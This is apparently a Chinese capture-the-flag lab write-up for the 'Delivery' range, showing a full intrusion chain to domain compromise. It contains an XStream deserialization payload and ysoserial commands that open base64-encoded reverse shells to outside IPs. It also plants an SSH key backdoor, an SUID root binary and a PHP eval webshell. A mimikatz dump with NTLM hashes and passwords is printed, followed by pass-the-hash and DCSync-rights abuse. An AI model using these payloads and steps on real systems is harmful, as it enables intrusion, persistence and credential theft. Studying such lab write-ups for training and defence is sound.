春秋云镜-Delivery

flag01

请测试 Delivery 暴露在公网上的 Web 应用的安全性,并尝试获取在该服务器上执行任意命令的能力。

fscan扫一下

image-20241106193235034

发现存在ftp的弱口令

连上看看

1.txt里没内容

pom.xml:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
<parsedMessage>true</parsedMessage>
<soapVersion>SOAP_11</soapVersion>
<bodyParts/>
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<attachmentsInitialized>false</attachmentsInitialized>
<nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
<aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
<candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
<names>
<string>aa</string>
<string>aa</string>
</names>
<ctx>
<environment/>
<registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
<java.rmi.server.RemoteObject>
<string>UnicastRef</string>
<string>140.143.143.130</string>
<int>1099</int>
<long>0</long>
<int>0</int>
<long>0</long>
<short>0</short>
<boolean>false</boolean>
</java.rmi.server.RemoteObject>
</registry>
<host>140.143.143.130</host>
<port>1099</port>
</ctx>
</candidates>
</aliases>
</nullIter>
</sm>
</message>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</java.util.PriorityQueue>
</java.util.PriorityQueue>

可以看到其中有xstream

image-20241106193643459

搜索发现存在CVE-2021-29505

https://blog.csdn.net/qq_42430287/article/details/135229815

利用ysoserial反弹shell

1
2
3
java -cp 1.jar ysoserial.exploit.JRMPListener 1010 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNDAuMTQzLjE0My4xMzAvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}"

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1338 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}"

payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
<parsedMessage>true</parsedMessage>
<soapVersion>SOAP_11</soapVersion>
<bodyParts/>
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<attachmentsInitialized>false</attachmentsInitialized>
<nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
<aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
<candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
<names>
<string>aa</string>
<string>aa</string>
</names>
<ctx>
<environment/>
<registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
<java.rmi.server.RemoteObject>
<string>UnicastRef</string>
<string>140.143.143.130</string>
<int>1099</int>
<long>0</long>
<int>0</int>
<long>0</long>
<short>0</short>
<boolean>false</boolean>
</java.rmi.server.RemoteObject>
</registry>
<host>140.143.143.130</host>
<port>1099</port>
</ctx>
</candidates>
</aliases>
</nullIter>
</sm>
</message>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</java.util.PriorityQueue>
</java.util.PriorityQueue>

反弹过来就是root权限

image-20241106202647363

flag02

老规矩上frp fscan

前面反弹过来shell手残给断了,写个ssh后门保险

echo ‘ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC08aTXlDw5IbzghqEXbl9jeS4HKQJdT9REhatCYTDQ7chjAc5SVgAPDto3lfar8hG2zvc7LR862MTEwkIplWg9iuEZRTwhOFkr8j/CFu80HwHx7neOYlhch14VeOA42NGV94jgqzTPLIiqh99xuUl0vjr/l3ZaNpqCWF+HCX2B7tn78k6/CQT9veYPI9N4ynN08FbqHfiPzCl9LG3hi5+djccR5iUJn1Y3bzWtQqu4V+RKR7eFGTEeRxm7NbWy9BPgbg15IS+AcDhrbiWhkH2ASI5D/6Rj+Nx0PKFBHN56An5Vkx7gncTpsVcUnW3oZIx+XSv1lpGuNQ+xWtFmeXqp2Orgd+5mms3C6lBLeJ1emB/aW77JWWBGSHbAl6F5WNwBaO065Q5Su0tgK0RlXK/LjJGAQOewSKePZevgLAtV1AioIedzl1nnp0vlxwrfgcCvRW1c8gniLuGc4BqpoDNBSUbjys5EwZE8mWfo+3ETVnuzM+KwzA9wJ8/ZfwL54aM= root@kali’ > /root/.ssh/authorized_keys

image-20241107150514297

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
172.22.13.6:139 open
172.22.13.28:135 open
172.22.13.6:135 open
172.22.13.14:22 open
172.22.13.57:80 open
172.22.13.28:80 open
172.22.13.57:22 open
172.22.13.14:80 open
172.22.13.14:21 open
172.22.13.28:3306 open
172.22.13.6:445 open
172.22.13.28:445 open
172.22.13.28:139 open
172.22.13.14:8080 open
172.22.13.28:8000 open
172.22.13.6:88 open
[*] WebTitle http://172.22.13.14 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] NetInfo
[*]172.22.13.28
[->]WIN-HAUWOLAO
[->]172.22.13.28
[*] NetInfo
[*]172.22.13.6
[->]WIN-DC
[->]172.22.13.6
[*] NetBios 172.22.13.6 [+] DC:XIAORANG\WIN-DC
[*] WebTitle http://172.22.13.57 code:200 len:4833 title:Welcome to CentOS
[+] ftp 172.22.13.14:21:anonymous
[->]1.txt
[->]pom.xml
[*] WebTitle http://172.22.13.14:8080 code:200 len:3655 title:公司发货单
[*] WebTitle http://172.22.13.28 code:200 len:2525 title:欢迎登录OA办公平台
[*] NetBios 172.22.13.28 WIN-HAUWOLAO.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.13.28:8000 code:200 len:170 title:Nothing Here.
[+] mysql 172.22.13.28:3306:root 123456

172.22.13.14 入口机

172.22.13.6 DC 域控

172.22.13.28 域内机器

172.22.13.57 跳板机

提示要打NFS

靶机上下载nfs_offline

nfs_offline_install.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
wget http://archive.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.3.4-2.5ubuntu3_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libn/libnfsidmap/libnfsidmap2_0.25-5.1ubuntu1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc3_1.2.5-1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/r/rpcbind/rpcbind_1.2.5-8_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/k/keyutils/keyutils_1.6-6ubuntu1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc-common_1.2.5-1_all.deb
sudo dpkg -i libnfsidmap2_0.25-5.1ubuntu1_amd64.deb && \
sudo dpkg -i libtirpc-common_1.2.5-1_all.deb && \
sudo dpkg -i libtirpc3_1.2.5-1_amd64.deb && \
sudo dpkg -i rpcbind_1.2.5-8_amd64.deb && \
sudo dpkg -i keyutils_1.6-6ubuntu1_amd64.deb && \
sudo dpkg -i nfs-common_1.3.4-2.5ubuntu3_amd64.deb

showmount -e 172.22.13.57

mkdir temp
mount -t nfs 172.22.13.57:/ ./temp -o nolock
写入ssh公钥
ssh-keygen -t rsa -b 4096
cd /temp/home/joyce/
mkdir .ssh
cat /root/.ssh/id_rsa.pub >> /temp/home/joyce/.ssh/authorized_keys

编译恶意c文件,给到suid root

echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > root.c
gcc root.c -o root
chmod +s root

image-20241107151937654

1
2
3
ssh -i /root/.ssh/id_rsa joyce@172.22.13.57
python3 -c 'import pty;pty.spawn("/bin/bash")'
运行恶意提权文件拿到root

image-20241107151954653

flag3

然后打之前内网扫出来的mysql

navicat连root/123456

show variables like “secure_file_priv”;
show variables like “%general%”;

phpstudy起的服务,并且可以写web文件

image-20241107152933741

1
select "<?php eval($_POST[1]);?>" into outfile "C:/phpstudy_pro/WWW/1.php";

链接蚁剑

image-20241107153210688

flag04

就剩

image-20241107161654393

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
Authentication Id : 0 ; 8786969 (00000000:00861419)
Session : RemoteInteractive from 2
User Name : Q1ngchuan
Domain : WIN-HAUWOLAO
Logon Server : WIN-HAUWOLAO
Logon Time : 2024/11/7 15:36:21
SID : S-1-5-21-2057596273-973658165-3030246172-1000
msv :
[00000003] Primary
* Username : Q1ngchuan
* Domain : WIN-HAUWOLAO
* NTLM : 397cb3952d50a1e29ee3308179c0ff81
* SHA1 : 330f6c01e54ee24d8dccb230712ef60361a0e2f4
tspkg :
wdigest :
* Username : Q1ngchuan
* Domain : WIN-HAUWOLAO
* Password : (null)
kerberos :
* Username : Q1ngchuan
* Domain : WIN-HAUWOLAO
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 8764753 (00000000:0085bd51)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/11/7 15:36:21
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : d3b77fdc91060b08a3d6288e9ef6348c
* SHA1 : 9c6605569086ba9c71d5f6c34fd88b4b4397ae2b
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN-HAUWOLAO$
* Domain : xiaorang.lab
* Password : ad 68 f5 a9 ae 76 24 5f db 80 bf 39 d9 5f bd 4e 2f 17 54 8b b0 81 b2 ff 14 80 7d 27 7b 80 62 09 8a 0c 12 de cc f0 22 a0 b1 ca 68 00 56 91 58 01 52 ad 73 3f 39 d7 9f 11 fa 68 6f 2c 06 47 99 23 3e d9 aa d2 dc 6e 17 bd f4 f2 a5 cc 49 d6 c2 23 ea 8c 9b 1f ea f9 75 f4 e5 17 c3 dd e3 64 4c 67 86 eb 83 2a d4 5f f3 24 65 50 79 a0 d4 27 e2 53 eb 0d 25 c4 85 df 77 cd 6c 10 7c 4b 1f cf 48 68 9c 5e bd 16 01 63 03 b7 4a 3c 87 b9 1b 3c c1 06 3d d6 b4 4d b9 bb 7b f7 f0 5f e8 5a 5f 2b ae ce a5 9d 22 0c 6f 73 df 70 70 a6 dc 72 4f 05 64 d0 f2 8b 2d ba a2 bf e3 0d e4 23 fa 17 9d 32 49 5a cd 0a 6d 0c 3b 2d cd 50 1d 42 17 a3 2a 37 77 2e 25 45 65 b6 37 e6 5c 4b cc 73 7c 4c d1 c1 87 87 d7 c7 7f d9 de ab 91 39 0a 0b 29 bc 4d 49 f8 80
ssp :
credman :

Authentication Id : 0 ; 92043 (00000000:0001678b)
Session : Service from 0
User Name : chenglei
Domain : XIAORANG
Logon Server : WIN-DC
Logon Time : 2024/11/7 14:52:57
SID : S-1-5-21-3269458654-3569381900-10559451-1105
msv :
[00000003] Primary
* Username : chenglei
* Domain : XIAORANG
* NTLM : 0c00801c30594a1b8eaa889d237c5382
* SHA1 : e8848f8a454e08957ec9814b9709129b7101fad7
* DPAPI : 89b179dc738db098372c365602b7b0f4
tspkg :
wdigest :
* Username : chenglei
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : chenglei
* Domain : XIAORANG.LAB
* Password : Xt61f3LBhg1
ssp :
credman :

Authentication Id : 0 ; 52638 (00000000:0000cd9e)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/11/7 14:52:55
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : b5cd3591a58e1169186bcdbfd4b6322d
* SHA1 : 226ee6b5e527e5903988f08993a2456e3297ee1f
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN-HAUWOLAO$
* Domain : xiaorang.lab
* Password : `k+hcEDFvtzoObj=>DvzxiNqwyEn;Eu-\zFVAh>.G0u%BqQ21FskHtJlW4)3is3V;7Iu)3B00kd1##IB'LLG6wSx6TR%m;`Nfr;;Hf8O'Szfl0Z=w+^,>0jR
ssp :
credman :

Authentication Id : 0 ; 52616 (00000000:0000cd88)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/11/7 14:52:55
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : d3b77fdc91060b08a3d6288e9ef6348c
* SHA1 : 9c6605569086ba9c71d5f6c34fd88b4b4397ae2b
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN-HAUWOLAO$
* Domain : xiaorang.lab
* Password : ad 68 f5 a9 ae 76 24 5f db 80 bf 39 d9 5f bd 4e 2f 17 54 8b b0 81 b2 ff 14 80 7d 27 7b 80 62 09 8a 0c 12 de cc f0 22 a0 b1 ca 68 00 56 91 58 01 52 ad 73 3f 39 d7 9f 11 fa 68 6f 2c 06 47 99 23 3e d9 aa d2 dc 6e 17 bd f4 f2 a5 cc 49 d6 c2 23 ea 8c 9b 1f ea f9 75 f4 e5 17 c3 dd e3 64 4c 67 86 eb 83 2a d4 5f f3 24 65 50 79 a0 d4 27 e2 53 eb 0d 25 c4 85 df 77 cd 6c 10 7c 4b 1f cf 48 68 9c 5e bd 16 01 63 03 b7 4a 3c 87 b9 1b 3c c1 06 3d d6 b4 4d b9 bb 7b f7 f0 5f e8 5a 5f 2b ae ce a5 9d 22 0c 6f 73 df 70 70 a6 dc 72 4f 05 64 d0 f2 8b 2d ba a2 bf e3 0d e4 23 fa 17 9d 32 49 5a cd 0a 6d 0c 3b 2d cd 50 1d 42 17 a3 2a 37 77 2e 25 45 65 b6 37 e6 5c 4b cc 73 7c 4c d1 c1 87 87 d7 c7 7f d9 de ab 91 39 0a 0b 29 bc 4d 49 f8 80
ssp :
credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WIN-HAUWOLAO$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2024/11/7 14:52:55
SID : S-1-5-20
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : d3b77fdc91060b08a3d6288e9ef6348c
* SHA1 : 9c6605569086ba9c71d5f6c34fd88b4b4397ae2b
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : win-hauwolao$
* Domain : XIAORANG.LAB
* Password : ad 68 f5 a9 ae 76 24 5f db 80 bf 39 d9 5f bd 4e 2f 17 54 8b b0 81 b2 ff 14 80 7d 27 7b 80 62 09 8a 0c 12 de cc f0 22 a0 b1 ca 68 00 56 91 58 01 52 ad 73 3f 39 d7 9f 11 fa 68 6f 2c 06 47 99 23 3e d9 aa d2 dc 6e 17 bd f4 f2 a5 cc 49 d6 c2 23 ea 8c 9b 1f ea f9 75 f4 e5 17 c3 dd e3 64 4c 67 86 eb 83 2a d4 5f f3 24 65 50 79 a0 d4 27 e2 53 eb 0d 25 c4 85 df 77 cd 6c 10 7c 4b 1f cf 48 68 9c 5e bd 16 01 63 03 b7 4a 3c 87 b9 1b 3c c1 06 3d d6 b4 4d b9 bb 7b f7 f0 5f e8 5a 5f 2b ae ce a5 9d 22 0c 6f 73 df 70 70 a6 dc 72 4f 05 64 d0 f2 8b 2d ba a2 bf e3 0d e4 23 fa 17 9d 32 49 5a cd 0a 6d 0c 3b 2d cd 50 1d 42 17 a3 2a 37 77 2e 25 45 65 b6 37 e6 5c 4b cc 73 7c 4c d1 c1 87 87 d7 c7 7f d9 de ab 91 39 0a 0b 29 bc 4d 49 f8 80
ssp :
credman :

Authentication Id : 0 ; 23854 (00000000:00005d2e)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2024/11/7 14:52:54
SID :
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : d3b77fdc91060b08a3d6288e9ef6348c
* SHA1 : 9c6605569086ba9c71d5f6c34fd88b4b4397ae2b
tspkg :
wdigest :
kerberos :
ssp :
credman :

Authentication Id : 0 ; 8786998 (00000000:00861436)
Session : RemoteInteractive from 2
User Name : Q1ngchuan
Domain : WIN-HAUWOLAO
Logon Server : WIN-HAUWOLAO
Logon Time : 2024/11/7 15:36:21
SID : S-1-5-21-2057596273-973658165-3030246172-1000
msv :
[00000003] Primary
* Username : Q1ngchuan
* Domain : WIN-HAUWOLAO
* NTLM : 397cb3952d50a1e29ee3308179c0ff81
* SHA1 : 330f6c01e54ee24d8dccb230712ef60361a0e2f4
tspkg :
wdigest :
* Username : Q1ngchuan
* Domain : WIN-HAUWOLAO
* Password : (null)
kerberos :
* Username : Q1ngchuan
* Domain : WIN-HAUWOLAO
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 8764822 (00000000:0085bd96)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/11/7 15:36:21
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : d3b77fdc91060b08a3d6288e9ef6348c
* SHA1 : 9c6605569086ba9c71d5f6c34fd88b4b4397ae2b
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN-HAUWOLAO$
* Domain : xiaorang.lab
* Password : ad 68 f5 a9 ae 76 24 5f db 80 bf 39 d9 5f bd 4e 2f 17 54 8b b0 81 b2 ff 14 80 7d 27 7b 80 62 09 8a 0c 12 de cc f0 22 a0 b1 ca 68 00 56 91 58 01 52 ad 73 3f 39 d7 9f 11 fa 68 6f 2c 06 47 99 23 3e d9 aa d2 dc 6e 17 bd f4 f2 a5 cc 49 d6 c2 23 ea 8c 9b 1f ea f9 75 f4 e5 17 c3 dd e3 64 4c 67 86 eb 83 2a d4 5f f3 24 65 50 79 a0 d4 27 e2 53 eb 0d 25 c4 85 df 77 cd 6c 10 7c 4b 1f cf 48 68 9c 5e bd 16 01 63 03 b7 4a 3c 87 b9 1b 3c c1 06 3d d6 b4 4d b9 bb 7b f7 f0 5f e8 5a 5f 2b ae ce a5 9d 22 0c 6f 73 df 70 70 a6 dc 72 4f 05 64 d0 f2 8b 2d ba a2 bf e3 0d e4 23 fa 17 9d 32 49 5a cd 0a 6d 0c 3b 2d cd 50 1d 42 17 a3 2a 37 77 2e 25 45 65 b6 37 e6 5c 4b cc 73 7c 4c d1 c1 87 87 d7 c7 7f d9 de ab 91 39 0a 0b 29 bc 4d 49 f8 80
ssp :
credman :

Authentication Id : 0 ; 92022 (00000000:00016776)
Session : Service from 0
User Name : chenglei
Domain : XIAORANG
Logon Server : WIN-DC
Logon Time : 2024/11/7 14:52:57
SID : S-1-5-21-3269458654-3569381900-10559451-1105
msv :
[00000003] Primary
* Username : chenglei
* Domain : XIAORANG
* NTLM : 0c00801c30594a1b8eaa889d237c5382
* SHA1 : e8848f8a454e08957ec9814b9709129b7101fad7
* DPAPI : 89b179dc738db098372c365602b7b0f4
tspkg :
wdigest :
* Username : chenglei
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : chenglei
* Domain : XIAORANG.LAB
* Password : Xt61f3LBhg1
ssp :
credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/11/7 14:52:55
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WIN-HAUWOLAO$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2024/11/7 14:52:54
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : win-hauwolao$
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :

打pth拿到SYSTEM

1
sekurlsa::pth /user:WIN-HAUWOLAO$ /domain:XIAORANG.LAB /ntlm:d3b77fdc91060b08a3d6288e9ef6348c

BloodHound进行信息 搜集

1
SharpHound.exe -c all

给chenglei去添加DCSync权限

1
proxychains4 python dacledit.py xiaorang.lab/chenglei -hashes :0c00801c30594a1b8eaa889d237c5382 -action write -rights DCSync -principal chenglei -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.13.6

image-20241107161243935

1
proxychains4 python dacledit.py xiaorang.lab/chenglei -hashes :0c00801c30594a1b8eaa889d237c5382 -action write -rights DCSync -principal chenglei -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.13.6

image-20241107155054235